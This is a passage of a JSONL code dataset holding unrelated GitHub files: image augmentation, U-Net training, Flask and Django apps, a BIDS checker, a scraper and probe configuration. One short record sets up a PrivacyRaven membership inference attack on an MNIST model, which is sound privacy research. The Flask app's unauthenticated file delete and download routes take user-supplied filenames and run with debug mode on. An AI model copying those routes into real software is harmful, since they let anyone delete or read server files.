PILImage.fromarray(segmentation_overlay.astype(\"uint8\"))\n    pil_image.paste(segmentation_overlay, mask=segmentation_overlay)\n\n    if return_pil_image:\n        return pil_image\n\n    else:\n        fig = plt.figure(figsize=figsize, dpi=dpi)\n        plt.imshow(pil_image)\n        plt.axis(\"off\")\n        mask_legend = plt.legend(\n            handles=legend_elements,\n            loc=\"upper left\",\n            frameon=False,\n            bbox_to_anchor=(1.01, 1),\n        )\n        plt.subplots_adjust(left=0.8)\n        plt.tight_layout()\n        plt.gca().add_artist(mask_legend)\n\n        return fig\n","repo_name":"Irtaza147/Smart_parking","sub_path":"venv/Lib/site-packages/segmentation_mask_overlay/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26433739462","text":"import skimage\nimport skimage.filters\nimport skimage.color\nimport random\nfrom random import randint\nfrom random import 
shuffle\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass AugmentBatch:\n\n def __init__(self):\n # Initialize seed\n #random.seed(42)\n # Create a list of functions that could be applied on the batch\n self.__list_func = [lambda img: self.convert_to_gray(img), lambda img: self.add_noise(img),\n lambda img: self.add_gaussian(img), lambda img: self.convert_to_sepia(img),\n lambda img: self.color_swap(img), lambda img: self.invert_color(img)]\n\n def augment(self, batch):\n # Roll the dice\n prob = random.random()\n\n # Half chance of nothing half do some augmentation\n if prob < 0.5:\n return batch\n else:\n # Do a copy of the batch\n new_batch = batch\n\n # Flip steering independent of other augmentations (Idea is to have more steering actions on training)\n batch_fliped = self.flip_horizontal(new_batch)\n\n # Do augmentations based on the lambda list __list_func\n idx = 0\n for (img, label) in batch_fliped:\n # Choose one operation to be applied on each image of the batch\n operation = randint(0, len(self.__list_func) - 1)\n # Choose the operation randomically\n img = self.__list_func[operation](img)\n batch_fliped[idx] = (img, label)\n idx += 1\n\n return batch_fliped\n\n def convert_to_gray(self, img):\n # Get each channel\n r, g, b = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n # To keep same number of channels add gray to each one.\n img[:, :, 0] = gray\n img[:, :, 1] = gray\n img[:, :, 2] = gray\n return img\n\n def convert_to_sepia(self, img):\n # Get each channel\n r, g, b = img[:, :, 0], img[:, :, 1], img[:, :, 2]\n # To keep same number of channels add gray to each one.\n img[:, :, 0] = 0.393 * r + 0.769 * g + 0.189 * b\n img[:, :, 1] = 0.349 * r + 0.686 * g + 0.168 * b\n img[:, :, 2] = 0.272 * r + 0.534 * g + 0.131 * b\n return img\n\n def add_noise(self, img):\n new_img = skimage.util.random_noise(img,var=0.001)\n return new_img\n\n def invert_color(self, img):\n new_img = skimage.util.invert(img)\n return new_img\n\n def add_gaussian(self, img):\n new_img = skimage.filters.gaussian(img,sigma=0.9, multichannel=True)\n return new_img\n\n def color_swap(self, img):\n new_img = img\n list_chanels = [0, 1, 2]\n random.shuffle(list_chanels)\n new_img[:, : ,0] = img[:, :, list_chanels[0]]\n new_img[:, :, 1] = img[:, :, list_chanels[1]]\n new_img[:, :, 2] = img[:, :, list_chanels[2]]\n return new_img\n\n # Flip both the image and the steering\n def flip_horizontal(self, batch):\n # Do a copy of the batch\n new_batch = batch\n idx = 0\n for (img, label) in new_batch:\n img = np.fliplr(img)\n label = np.fliplr(label)\n new_batch[idx] = (img, label)\n idx += 1\n return new_batch\n\n def display_batch(self, batch):\n for img, steering in batch:\n plt.imshow(img)\n plt.show()","repo_name":"leonardoaraujosantos/LearnSegmentation","sub_path":"src/tensorflow/augment_batch.py","file_name":"augment_batch.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"96"} +{"seq_id":"37461800652","text":"from flask import Flask, request, render_template, jsonify, url_for, send_file\nimport pandas as pd\nimport subprocess\nimport os\nimport io\nimport tempfile\nimport plotly.express as px\nimport plotly.io as pio\nfrom award import main\n\n\napp = Flask(__name__)\n\n@app.after_request\ndef add_header(response):\n if 'Cache-Control' not in response.headers:\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, 
max-age=0'\n return response\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n quarter = int(request.form[\"quarter\"]) # Get the selected quarter from the form\n year = request.form.get('year')\n action = request.form.get('action')\n print(action)\n \n try:\n df_data = process_quarter(quarter, year)\n if action == 'download':\n fname = f\"quarterly_{quarter}_report.csv\"\n fname = download_csv(df_data, fname)\n return jsonify({'success': True, 'filename': fname, 'action': 'download'})\n elif action == 'plot':\n return bonus_chart(quarter,year)\n\n except AttributeError:\n return jsonify({'error': \"No data present for this quarter or year yet\"})\n except Exception as e:\n return jsonify({'error': f\"An error occurred: {e}\"})\n else:\n return render_template(\"index.html\")\n\n@app.route(\"/download/\")\ndef download_file(filename):\n try:\n return send_file(os.path.join('static', filename), as_attachment=True, mimetype='text/csv')\n except Exception as e:\n return str(e)\n\n@app.route(\"/delete/\", methods=['POST'])\ndef delete_file(filename):\n file_path = os.path.join('static', filename)\n try:\n os.remove(file_path)\n return jsonify({'success': True})\n except Exception as e:\n return jsonify({'error': str(e)})\n\n\n\n@app.route(\"/bonus_plot//\", methods=[\"GET\"])\ndef bonus_plot(quarter, year):\n df = process_quarter(quarter, year)\n\n \n # Sort the dataframe by 'Total Bonus'\n df = df.sort_values('Total Bonus')\n \n fig = px.bar(df, \n x='Driver ID', \n y='Total Bonus', \n color='Total Bonus', # change the color to be based on 'Total Bonus'\n title='Total Bonus per Driver',\n hover_data=['Total Bonus'], # this will add a hover text for 'Total Bonus'\n labels={'Total Bonus':'Total Bonus', 'Driver ID':'Driver ID'})\n\n # Convert the figures to HTML and remove the surrounding tags\n plot_html = pio.to_html(fig, full_html=False)\n \n return render_template('plot.html', plot=plot_html)\n\n@app.route(\"/bonus_chart///\", methods=[\"GET\"])\ndef bonus_chart(quarter, year, driver_id = None):\n df = process_quarter(quarter, year, str(driver_id))\n # Sort the dataframe by 'Total Bonus'\n df = df.sort_values('Total Bonus')\n # print(df.to_json(orient='records'))\n # Send DataFrame as JSON to the client\n return render_template('chart.html', data=df.to_json(orient='records'), driverId=driver_id, year=year, quarter=quarter)\n\n@app.route(\"/scorecard///\", methods=[\"GET\"])\ndef score_card(quarter, year, driver_id):\n df = process_quarter(quarter, year, str(driver_id))\n df = df.sort_values('Total Bonus')\n return render_template('scorecard.html', data=df.to_json(orient='records'), driverId=driver_id, year=year, quarter=quarter)\n\n@app.route(\"/pie//\", methods=[\"GET\"])\ndef pie(quarter, year):\n print(\"hello\")\n df = process_quarter(quarter, year)\n df = df.sort_values('Total Bonus')\n return render_template('pie.html', data=df.to_json(orient='records'), year=year, quarter=quarter)\n\n\n\n\ndef process_quarter(quarter: int, year: int, driver_id = None):\n \"\"\"Process the file and delete it afterwards.\"\"\"\n print(driver_id)\n return main(int(quarter), int(year), driver_id)\n\n# def download_csv(df: pd.DataFrame, fname:str):\n# temp = tempfile.NamedTemporaryFile(suffix=\".csv\")\n# df.to_csv(temp.name, index=False)\n# return send_file(temp.name, as_attachment=True, attachment_filename=fname)\ndef download_csv(df: pd.DataFrame, fname:str):\n if not os.path.isdir('static'):\n os.makedirs('static')\n file_path = os.path.join('static', 
fname)\n df.to_csv(file_path, index=False)\n return fname\n\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=8080, debug=True)\n\n\n\n#4400324","repo_name":"armaanchhina/safety_award-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23093324361","text":"from bids import BIDSLayout\nimport bids\nimport tempfile\nimport argparse\nimport os\nimport sys\nimport time\nimport math\n\ndef check_subject_session_directories( path, base, sub, session ):\n dirs = os.listdir( os.path.join(path, sub, session) )\n os.mkdir( os.path.join(base, sub, session) )\n for d in dirs:\n os.symlink(os.path.join(path,sub,session,d), os.path.join(base, sub, session,d) )\n \n try:\n x = BIDSLayout(root=base)\n except:\n print(\"FAILURE - \" + sub + \" - \" + session + \" - \" + d)\n ret = False\n os.unlink( os.path.join(base, sub, session,d) )\n\n os.rmdir( os.path.join(base, sub, session) )\n\ndef check_subject_sessions(path, base, sub):\n sessions = os.listdir( os.path.join(path, sub ) )\n os.mkdir( os.path.join(base, sub) )\n for ses in sessions:\n #print(\"subject - \" + sub + \", session - \" + ses)\n os.symlink( os.path.join(path,sub,ses), os.path.join(base, sub, ses) )\n \n try:\n x = BIDSLayout(root=base) \n except:\n print(\"FAILURE - \" + sub + \" - \" + ses)\n os.unlink( os.path.join(base, sub, ses))\n check_subject_session_directories( path,base,sub,ses )\n ret = False\n\n if os.path.isdir( os.path.join(base, sub, ses) ):\t\n os.unlink(os.path.join(base, sub, ses))\n \n os.rmdir( os.path.join(base, sub) )\n\ndef check_subject_level(path, base, sub):\n \n os.symlink( os.path.join(path,sub), os.path.join(base,sub) )\n ret = True\n try:\n x = BIDSLayout(root=base)\n except:\n ret = False\n os.unlink(os.path.join(base,sub))\n\n return(ret)\n\n\n\n\ndef main():\n\n # avoid warning\n bids.config.set_option('extension_initial_dot', True)\n \n my_parser = argparse.ArgumentParser(description='Identify abdominal slab')\n my_parser.add_argument('-p', '--path', type=str, help='base path', required=True)\n my_parser.add_argument('-t', '--temp', type=str, help='temp path', required=False, default=\"/scratch\")\n args = my_parser.parse_args()\n\n tpath = args.temp\n if not os.path.isdir(tpath):\n tpath = \"/tmp\" \n\n jobid = os.environ[\"LSB_JOBID\"]\n base = tempfile.mkdtemp(dir=tpath, prefix=\"job_\"+str(jobid)+\"_\", suffix=\"_bidslayout\")\n #print(base) \n\n sTime = time.time()\n items = os.listdir(path=args.path)\n print(\"Checking \" + str(len(items)) + \" items\" )\n desc = os.path.join(args.path, \"dataset_description.json\")\n print(desc) \n if not os.path.isfile(desc):\n print(\"Missing: \"+desc)\n exit(1)\n os.symlink(desc, os.path.join(base, \"dataset_description.json\"))\n\n failure=[]\n items.remove(\"dataset_description.json\")\n for i,itm in enumerate(items):\n #print(\"Testing: \"+itm+\" \"+str(i)+\"/\"+str(len(items)))\n if not check_subject_level(args.path, base, itm):\n failure.append(itm)\n print(\"FAILURE - \"+str(itm))\n check_subject_sessions(args.path, base, itm)\n\n\n os.unlink(os.path.join(base, \"dataset_description.json\"))\n os.rmdir(base)\n\n ret=0\n if len(failure) > 0:\n ret=1\n print(failure)\n\n rTime = time.time() - sTime\n h = math.floor( rTime / 60 / 60)\n m = math.floor( (rTime - 60*60*h)/60 )\n s = math.floor( (rTime - 60*60*h - 60*m) )\n print(\"Run time = \" + str(h) + \"h \" + str(m) + \"m \" + str(s) + 
\"s\")\n\n print(\"Done\")\n return(ret)\n \n \n\nif __name__==\"__main__\":\n sys.exit(main())\n","repo_name":"ftd-u01/checkBids","sub_path":"checkBids.py","file_name":"checkBids.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26160075007","text":"import sys\nimport time\n\nsys.stdin = open(\"ExpertAcademy1244.txt\")\n\nstart = time.time()\n\n\n# 첫제출(시간초과)\ndef powerset(arr, cnt):\n if cnt == change:\n global res\n global maxs\n an = ''\n for f in arr:\n an += f\n maxs += 1\n print(an, maxs)\n res.append(int(an))\n return\n tarr = arr.copy()\n for g in range(len(arr)):\n for f in range(len(arr)):\n if f != g:\n tarr[f], tarr[g] = tarr[g], tarr[f]\n powerset(tarr, cnt + 1)\n\n\nfor tc in range(int(input())):\n maxs = 0\n num, change = input().split()\n num = list(num)\n change = int(change)\n res = []\n powerset(num, 0)\n print(len(res), res)\n print(\"#{} {}\".format(tc + 1, max(res)))\nprint('time', time.time() - start)\n","repo_name":"namnamDev/namnamDev","sub_path":"ExpertAcademy1244.py","file_name":"ExpertAcademy1244.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"15744704409","text":"from typing import List\nfrom operators.property_sourcing_base import PropertySourcingBaseOperator\nfrom bs4 import BeautifulSoup\n\n\nclass MidLandRealitySourcingOperator(PropertySourcingBaseOperator):\n @staticmethod\n def get_sfa_gfa(space: List):\n if len(space) > 1:\n sfa, gfa = space[0].get_text().replace(\"SFA\", \"\").replace(\"ft²\", \"\").replace(\"\\xa0\", \"\"), \\\n space[1].get_text().replace(\"GFA\", \"\").replace(\"ft²\", \"\").replace(\"\\xa0\", \"\")\n return sfa, gfa\n elif len(space) == 1:\n return space[0].get_text().replace(\"SFA\", \"\").replace(\"ft²\", \"\").replace(\"\\xa0\", \"\"), None\n else:\n return None, None\n\n def get_property_info(self, html_source):\n import pandas as pd\n soup = BeautifulSoup(html_source, 'html.parser')\n \n rooms = []\n rents = soup.find_all(\"div\", class_=\"sc-1r1odlb-23 etCoIy\")\n\n for rent in rents:\n titles = rent.find(\"div\", class_=\"sc-wivooq-1 hCnCJl\").get_text()\n title_list = titles.strip().split(\"\\n\")\n title = title_list[0].strip()\n\n if len(title_list) < 3:\n sub_title = None\n else:\n sub_title = title_list[2].strip()\n\n space = rent.find_all(\"div\", class_=\"sc-gqqyk9-1 kYfBEV\")\n space_element = self.get_sfa_gfa(space)\n mon_price = rent.find(\"span\", class_=\"sc-hlnw2x-6 kktEPG\").get_text()[1:]\n location = rent.find(\"span\", class_=\"sc-1r1odlb-9 dHhWAt\").get_text()\n features = rent.find_all(\"div\", class_=\"sc-1r1odlb-16 gopLNA\")\n features_combined = \"\"\n\n for i in range(len(features) // 2):\n features_combined += features[i].get_text() + \"&&\"\n\n age = rent.find(\"div\", class_=\"sc-w2gv6f-0 eMkKmr\")\n\n if age:\n age = age.get_text()\n else:\n age = None\n\n url = rent.find('a', href=True)['href']\n room_idx = url.split(\"-\")[-1]\n\n room_info = {\"date\": self.execution_date, \"room_idx\": room_idx, \"title\": title, \"sub_title\": sub_title,\n \"sfa\": space_element[0], \"gfa\": space_element[1], \"mon_price\": mon_price, \"age\": age,\n \"location\": location, \"features_combined\": features_combined, \"url\": url}\n\n if room_info not in rooms:\n rooms.append(room_info)\n\n self.log.info(\"------- Property Info -------\")\n self.log.info(rooms)\n\n self.log.info(f\"# of properties: 
{len(rooms)}\")\n return rooms\n","repo_name":"yelee20/airflow-gke","sub_path":"dags/operators/midland_reality_sourcing.py","file_name":"midland_reality_sourcing.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13837166174","text":"from abc import ABC, abstractmethod\n\nfrom aiohttp import ClientSession as Client\n\nfrom .web import Request\n\nclass Auth(ABC):\n 'Implement for any authentication scheme.'\n @abstractmethod\n async def sign(self, client: Client, request: Request) -> Request: pass\n\n @staticmethod\n def none() -> 'NoAuth': return NoAuth()\n\n\nclass UrlApiKey(Auth):\n 'URL parameter with a secret to authorize requests.'\n params: dict[str, str]\n\n def __init__(self, param_name: str, secret: str):\n self.params = {param_name: secret}\n\n async def sign(self, client: Client, request: Request) -> Request:\n request.query_params |= self.params\n return request\n\nclass HeaderApiKey(Auth):\n 'Header with a secret to authorize requests.'\n headers: dict[str, str]\n\n def __init__(self, param_name: str, secret: str):\n self.headers = {param_name: secret}\n\n async def sign(self, client: Client, request: Request) -> Request:\n request.headers |= self.headers\n return request\n\nclass NoAuth(Auth):\n 'Does nothing.'\n\n async def sign(self, client: Client, request: Request) -> Request: return request\n\n\n\n","repo_name":"dunkyl/SlyAPI-Python","sub_path":"src/SlyAPI/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13022316750","text":"import os\n\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom architectures.custom_unet import U_Net as Model\nfrom dataset import SegmentationDataset\nfrom losses import tversky_loss, tversky_coeff\n\n\ndef train(model, device, train_loader, optimizer, epoch, scheduler=None):\n model.train()\n nb_samples = 0\n epoch_loss = 0\n\n for batch_idx, (data, target) in enumerate(train_loader):\n nb_samples += len(data)\n data, target = data.to(device), target.to(device)\n\n output = model(data)\n\n if isinstance(output, list):\n loss = tversky_loss(output[0], target, reduction=\"sum\")\n for i in range(1, len(output)):\n target_resized = F.interpolate(\n target, scale_factor=1 / 2 ** i, mode=\"bilinear\", align_corners=True\n )\n target_resized = torch.where(\n target_resized > 0.1,\n torch.tensor(1.0, device=device),\n torch.tensor(0.0, device=device),\n )\n loss = loss + tversky_loss(output[i], target_resized, reduction=\"sum\")\n loss = loss / len(output)\n else:\n loss = tversky_loss(output, target, reduction=\"sum\")\n\n epoch_loss += loss.item()\n loss = loss / len(data)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if scheduler:\n scheduler.step()\n\n print(\n \"Train Epoch: {} [{}/{} ({:.0f}%)], Loss: {:.6f}\".format(\n epoch,\n nb_samples,\n len(train_loader.dataset),\n 100.0 * (batch_idx + 1) / len(train_loader),\n loss.item(),\n ),\n end=\"\\r\",\n )\n\n epoch_loss /= len(train_loader.dataset)\n print(\n \"Train Epoch: {} [{}/{} ({:.0f}%)], Average Loss: {:.6f}\".format(\n epoch, nb_samples, len(train_loader.dataset), 100.0, epoch_loss\n )\n )\n return epoch_loss\n\n\ndef validate(model, device, test_loader):\n model.eval()\n test_loss = 0\n test_dice = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = 
data.to(device), target.to(device)\n output = model(data)\n if isinstance(output, list):\n output = output[0]\n test_loss += tversky_loss(output, target, reduction=\"sum\").item()\n test_dice += tversky_coeff(\n output, target, hard=True, reduction=\"sum\"\n ).item()\n\n test_loss /= len(test_loader.dataset)\n test_dice /= len(test_loader.dataset)\n print(\"Test set: Average score: {:.6f} (loss: {:.6f})\".format(test_dice, test_loss))\n return test_loss, test_dice\n\n\ndef checkpoint(model, test_dice, optimizer, epoch, input_size, weight_decay, infos=\"\"):\n file_name = \"{}_dice={:.3f}_{}_ep={}_{}_wd={}_{}.pth\".format(\n model.__class__.__name__,\n test_dice,\n optimizer.__class__.__name__,\n epoch,\n input_size,\n weight_decay,\n infos,\n )\n path = os.path.join(\"../../models/\", file_name)\n if test_dice > 0.47 and not os.path.isfile(path):\n torch.save(model.state_dict(), path)\n print(\"Saved: \", file_name)\n\n\ndef main():\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n\n # Hyperparams\n batch_size = 16\n epochs = 40\n input_size = (216, 320)\n weight_decay = 1e-4\n print(f\"Batch size: {batch_size}, input size: {input_size}, wd: {weight_decay}\")\n\n # Create datasets\n train_indices = np.load(\"../../data/processed/train_indices.npy\")\n test_indices = np.load(\"../../data/processed/test_indices.npy\")\n # valid_indices = np.load(\"../../data/processed/valid_indices.npy\")\n\n # Merge train and test\n # train_indices = np.concatenate((train_indices, test_indices))\n # test_indices = valid_indices\n\n # Make sure there's no overlap\n assert not set(train_indices) & set(test_indices)\n\n # Datasets\n train_set = torch.utils.data.Subset(\n SegmentationDataset(\n \"../../data/raw/training_set/\", input_size=input_size, train_mode=True\n ),\n train_indices,\n )\n test_set = torch.utils.data.Subset(\n SegmentationDataset(\n \"../../data/raw/training_set/\", input_size=input_size, train_mode=True\n ),\n test_indices,\n )\n print(\"Training set size: \", len(train_set))\n print(\"Test set size : \", len(test_set))\n print(\"Total: \", len(train_set) + len(test_set))\n\n # Dataloaders\n train_loader = torch.utils.data.DataLoader(\n dataset=train_set,\n batch_size=batch_size,\n shuffle=True,\n num_workers=4,\n pin_memory=True,\n )\n\n test_loader = torch.utils.data.DataLoader(\n dataset=test_set,\n batch_size=batch_size,\n shuffle=False,\n num_workers=4,\n pin_memory=True,\n )\n\n model = Model().to(device)\n print(Model.__name__)\n\n # he initialization\n for m in model.modules():\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.kaiming_normal_(m.weight, mode=\"fan_in\")\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n optimizer = torch.optim.SGD(\n model.parameters(), lr=1e-1, momentum=0.9, weight_decay=weight_decay\n )\n print(\"Optimizer: \", optimizer.__class__.__name__)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(\n optimizer, milestones=[8, 14, 19, 25, 30, 35], gamma=0.1\n )\n\n train_loss_history = list()\n test_loss_history = list()\n test_dice_history = list()\n\n for epoch in range(1, epochs + 1):\n print(\"################## EPOCH {}/{} ##################\".format(epoch, epochs))\n\n for param_group in optimizer.param_groups:\n print(\"Current learning rate:\", param_group[\"lr\"])\n\n train_loss = train(model, device, train_loader, optimizer, epoch)\n test_loss, test_dice = validate(model, device, test_loader)\n\n scheduler.step()\n\n # Save model\n if epoch 
> 1 and test_dice > max(test_dice_history):\n checkpoint(\n model,\n test_dice,\n optimizer,\n epoch,\n input_size,\n weight_decay,\n infos=\"tversky_loss\",\n )\n\n train_loss_history.append(train_loss)\n test_loss_history.append(test_loss)\n test_dice_history.append(test_dice)\n\n # # Save history at each epoch (overwrite previous history)\n history = [train_loss_history, test_loss_history, test_dice_history]\n np.save(\"history.npy\", np.array(history))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jonas1312/ChallengeHC18","sub_path":"src/models/train_segmentation.py","file_name":"train_segmentation.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"38458378504","text":"import privacyraven as pr\nfrom privacyraven.utils.data import get_emnist_data\n\n# from privacyraven.extraction.core import ModelExtractionAttack\nfrom privacyraven.m_inference.core import MembershipInferenceAttack\nfrom privacyraven.utils.query import get_target\nfrom privacyraven.models.victim import train_mnist_victim\nfrom privacyraven.models.pytorch import ImagenetTransferLearning, ThreeLayerClassifier\n\n# Create a query function for a PyTorch Lightning model\nmodel = train_mnist_victim()\n\n\ndef query_mnist(input_data):\n return get_target(model, input_data)\n\n\n# Obtain seed (or public) data to be used\nemnist_train, emnist_test = get_emnist_data()\n\nattack = MembershipInferenceAttack(\n query_mnist,\n 100,\n (1, 28, 28, 1),\n 10,\n (1, 3, 28, 28),\n \"copycat\",\n ThreeLayerClassifier,\n 1000,\n emnist_train,\n emnist_test,\n)\n","repo_name":"suhacker1/SecureMLExperiments","sub_path":"m_inf_mnist.py","file_name":"m_inf_mnist.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6379784179","text":"from urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.utils.http import is_same_domain\nfrom rest_framework import permissions\n\n\ndef _report_warning_to_rollbar(message, extra_data=None):\n ROLLBAR = getattr(settings, 'ROLLBAR', {})\n if ROLLBAR:\n import rollbar\n rollbar.report_message(message, level='warning', extra_data=extra_data)\n\n\ndef referring_host(request):\n referer = urlparse(request.META.get('HTTP_REFERER', ''))\n return referer.netloc.split(':')[0]\n\n\ndef referring_host_is_allowed(host):\n for pattern in settings.ALLOWED_HOSTS:\n if is_same_domain(host, pattern):\n return True\n return False\n\n\nclass IsAuthenticatedOrWebClient(permissions.BasePermission):\n def has_permission(self, request, view):\n if request.user and request.user.is_authenticated:\n return True\n\n if settings.OAR_CLIENT_KEY == '':\n return True\n\n if request.path.startswith(\"/api/info\"):\n return True\n\n client_key = request.META.get('HTTP_X_OAR_CLIENT_KEY')\n if client_key == settings.OAR_CLIENT_KEY:\n host = referring_host(request)\n if referring_host_is_allowed(host):\n return True\n else:\n _report_warning_to_rollbar(\n 'Unallowed referring host passed with API request',\n extra_data={'host': host})\n else:\n _report_warning_to_rollbar(\n 'Incorrect client key submitted with API request',\n extra_data={'client_key': client_key})\n\n return False\n\n\nclass IsAllowedHost(permissions.BasePermission):\n def has_permission(self, request, view):\n host = referring_host(request)\n if referring_host_is_allowed(host):\n return True\n else:\n _report_warning_to_rollbar(\n 
'Unallowed referring host passed with API request',\n extra_data={'host': host})\n\n\nclass IsRegisteredAndConfirmed(permissions.BasePermission):\n message = 'Insufficient permissions'\n\n def has_permission(self, request, view):\n if not request.user.is_authenticated:\n return False\n\n if not request.user.is_active:\n return False\n\n if not request.user.did_register_and_confirm_email:\n return False\n\n return True\n","repo_name":"opensupplyhub/open-apparel-registry","sub_path":"src/django/api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"96"} +{"seq_id":"52549058","text":"from django.views.generic import TemplateView\nfrom ..models import AgentTransport\nfrom django.shortcuts import redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\n\nclass AgentTransportDeleteView(TemplateView):\n\n @login_required(login_url=reverse_lazy('login'))\n def delete_data_agent_transport(request, pk):\n agent_transport = AgentTransport.objects.get(pk=pk)\n agent_transport.delete()\n\n if request.method == \"GET\":\n filter_by = request.GET.get(\"filter_by\")\n date_filter = request.GET.get(\"date_filter\")\n if not date_filter:\n return redirect(reverse('agent-transport-table'))\n else:\n return redirect(reverse('agent-transport-table') + '?filter_by=' + filter_by + '&date_filter=' + date_filter)\n\n\n @login_required(login_url=reverse_lazy('login'))\n def delete_multiple_data_agent_transport(request):\n \n if request.method == \"POST\":\n pk_list = request.POST.getlist('pk')\n filter_by = request.POST['filter_by']\n date_filter = request.POST['date_filter']\n\n for pk in pk_list:\n agent_transport = AgentTransport.objects.get(pk=pk)\n agent_transport.delete()\n\n if not date_filter:\n return redirect(reverse('agent-transport-table'))\n else:\n return redirect(reverse('agent-transport-table') + '?filter_by=' + filter_by + '&date_filter=' + date_filter)","repo_name":"ipoobest/demo-auto-deployment","sub_path":"ndd-app/agent_transport/views/agent_transport_delete_view.py","file_name":"agent_transport_delete_view.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41005964480","text":"import logging\nimport os\nimport threading\nimport weakref\nfrom .models import ProbeSource\nfrom .sync import ProbeViewSync\n\n\nlogger = logging.getLogger(\"zentral.core.probes.conf\")\n\n\nclass ProbeView(object):\n def __init__(self, parent=None, with_sync=False):\n self.parent = parent\n self._probes = None\n self._lock = threading.Lock()\n self.with_sync = with_sync\n self.sync = None\n\n def clear(self):\n with self._lock:\n self._probes = None\n\n def iter_parent_probes(self):\n if self.parent is None:\n for p in ProbeSource.objects.active():\n yield p.load()\n else:\n yield from self.parent\n\n def _start_sync(self):\n if self.with_sync:\n if self.sync is not None:\n if self.sync.is_alive():\n return\n else:\n logger.error(\"Sync thread is not alive. 
Last heartbeat %s.\", self.sync.last_heartbeat or \"-\")\n # separate thread to listen to the probe change signal\n self.sync = ProbeViewSync(self)\n self.sync.start()\n\n def __iter__(self):\n with self._lock:\n self._load()\n yield from self._probes\n\n def __len__(self):\n with self._lock:\n self._load()\n return len(self._probes)\n\n\nclass ProbesDict(ProbeView):\n def __init__(self, parent=None, item_func=None, unique_key=True, with_sync=False):\n super(ProbesDict, self).__init__(parent, with_sync=with_sync)\n if item_func is None:\n self.item_func = lambda p: [(p.name, p)]\n else:\n self.item_func = item_func\n self.unique_key = unique_key\n\n def _load(self):\n self._start_sync()\n if self._probes is None:\n self._probes = {}\n for probe in self.iter_parent_probes():\n for key, val in self.item_func(probe):\n if self.unique_key:\n self._probes[key] = val\n else:\n self._probes.setdefault(key, []).append(val)\n\n def __getitem__(self, key):\n with self._lock:\n self._load()\n return self._probes[key]\n\n def keys(self):\n with self._lock:\n self._load()\n return self._probes.keys()\n\n def get(self, *args, **kwargs):\n with self._lock:\n self._load()\n return self._probes.get(*args, **kwargs)\n\n\nclass ProbeList(ProbeView):\n def __init__(self, parent=None, filter_func=None, with_sync=False):\n super(ProbeList, self).__init__(parent, with_sync=with_sync)\n self.filter_func = filter_func\n self._children = weakref.WeakSet()\n\n def clear(self):\n with self._lock:\n self._probes = None\n for child in self._children:\n child.clear()\n\n def _load(self):\n self._start_sync()\n if self._probes is None:\n self._probes = []\n for probe in self.iter_parent_probes():\n if self.filter_func is None or self.filter_func(probe):\n self._probes.append(probe)\n\n def filter(self, filter_func):\n child = self.__class__(self, filter_func)\n self._children.add(child)\n return child\n\n def dict(self, item_func=None, unique_key=True):\n child = ProbesDict(self, item_func, unique_key)\n self._children.add(child)\n return child\n\n def event_filtered(self, event):\n def _filter(probe):\n return probe.test_event(event)\n return self.filter(_filter)\n\n\n# used for the tests, to avoid having an extra DB connection\nzentral_probes_sync = os.environ.get(\"ZENTRAL_PROBES_SYNC\", \"1\") == \"1\"\n\n\nall_probes = ProbeList(with_sync=zentral_probes_sync)\nall_probes_dict = all_probes.dict(item_func=lambda p: [(p.pk, p)], unique_key=True)\n","repo_name":"zentralopensource/zentral","sub_path":"zentral/core/probes/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":705,"dataset":"github-code","pt":"96"} +{"seq_id":"10913233064","text":"numeros = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\ndef multiplicar_por_10(numero):\n\n return numero * 2\n\n\nnueva_multi = multiplicar_por_10(numeros)\nnueva_multi_2 = list(map(multiplicar_por_10, numeros))\n\nprint(nueva_multi)\nprint(nueva_multi_2)\n\n\ndef convertir_en_string_mas_unidad(numero):\n return f'{numero} 